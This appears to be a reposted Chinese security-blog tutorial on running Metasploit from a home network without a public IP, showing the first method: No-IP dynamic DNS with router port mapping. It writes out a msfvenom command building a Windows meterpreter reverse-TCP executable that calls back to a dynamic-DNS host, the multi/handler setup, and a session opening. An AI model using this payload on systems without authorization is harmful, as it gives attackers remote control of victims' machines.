1. 极安网首页
  2. 网络安全技术

Metasploit内网使用的三种方法

Metasploit内网使用的三种方法-极安网

前言

一些新手朋友在使用Metasploit进行安全测试时可能经常遇到自己没有公网IP,又没有VPS的尴尬情况,如果遇到这种情况时我们又该如何在本地内网环境中使用Metasploit对其目标进行测试呢?在这篇文章中笔者将给大家介绍3种常用方法,再也不怕没有公网IP和VPS了。

第一种:No-ip动态域名

使用msfvenom命令生成载荷文件时需要填写我们监听的公网IP地址和端口号,但由于我们是动态IP,每次生成载荷文件时都需要填写不同的公网IP,个人感觉这样很是麻烦,所以这时就可以用No-ip提供的动态域名解析服务结合路由器的端口映射功能来解决这个问题。

No-ip(https://www.noip.com)是一个非常流行的动态域名解析服务,就是将ISP分配给我们的动态公网IP绑定到No-ip提供的免费域名上,每次重启后只需在No-ip客户端更新下就可以了,客户端支持Mac、Linux和Windows平台。

首先我们得先在No-ip官网进行注册,登录No-ip后创建个免费域名,下载并安装好No-ip客户端,设置好自动更新间隔时间,等一会msf8.ddns.net域名就已经解析过来了。

Metasploit内网使用的三种方法-极安网

下载No-ip客户端源码并进行编译安装:

  1. root@kali:~# cd /usr/local/src/
  2. root@kali:~# wget http://www.no-ip.com/client/linux/noip-duc-linux.tar.gz
  3. root@kali:~# tar xf noip-duc-linux.tar.gz
  4. root@kali:~# cd noip-2.1.9-1/
  5. root@kali:~# make
  6. root@kali:~# sudo make install
  7. root@kali:~# sudo /usr/local/bin/noip2          //启动No-ip客户端
  8. root@kali:~# sudo /usr/local/bin/noip2 -C       //重新配置一次
  9. root@kali:~# sudo /usr/local/bin/noip2 -S       //显示当前运行状态、信息

安装过程中主要填写以下几项:

  1. Please enter the login/email string for no-ip.com  msf8@gmail.com(输入注册时填的邮箱地址)
  2. Please enter the password for user 'msf8@gmail.com'  *******(输入密码)
  3. Please enter an update interval:[30](noip客户端检查路由器外部网址变化间隔,默认30分钟)
  4. Do you wish to run something at successful update?[N] (y/N)  n(直接按回车即可)
  1. root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=msf8.ddns.net LPORT=443 -f exe > /root/noip.exe
  2. msf > use exploit/multi/handler
  3. msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
  4. msf exploit(multi/handler) > set lhost 192.168.1.120
  5. msf exploit(multi/handler) > set lport 443
  6. msf exploit(multi/handler) > exploit
  7. [*] Started reverse TCP handler on 192.168.1.120:443
  8. [*] Starting the payload handler...
  9. [*] Sending stage (1189423 bytes) to 192.168.1.120
  10. [*] Meterpreter session 1 opened (192.168.1.120:443 -> 192.168.1.108:49199) at 2017-04-01 02:01:16 +0800

注:这种方法在以前家庭网络中做渗透测试时经常用到的,但现在运营商提供的宽带服务,无论是动态IP还是固定IP,默认都禁止了所有端口对外服务,所以现在路由器里配置的端口映射和DMZ功能都已经失效了,也就是说这种方法可能已不再适用,如果申请开通端口还需要进行域名备案,麻烦!

运营商这样做的目的就是为了防止个人随意开设各种非法服务,也能够防止黑客通过扫描器进行的批量扫描和抓鸡等攻击行为。这样封禁能在一定程度上保证了我们的网络安全,比如说17年爆出的MS17010永恒之蓝漏洞,445端口被运营商封禁了,这样就使得国内个人家庭电脑被攻击的机率小了很多。

本文转载:3had0w,不代表 极安网 立场,转载请注明出处:https://secvery.com/3084.html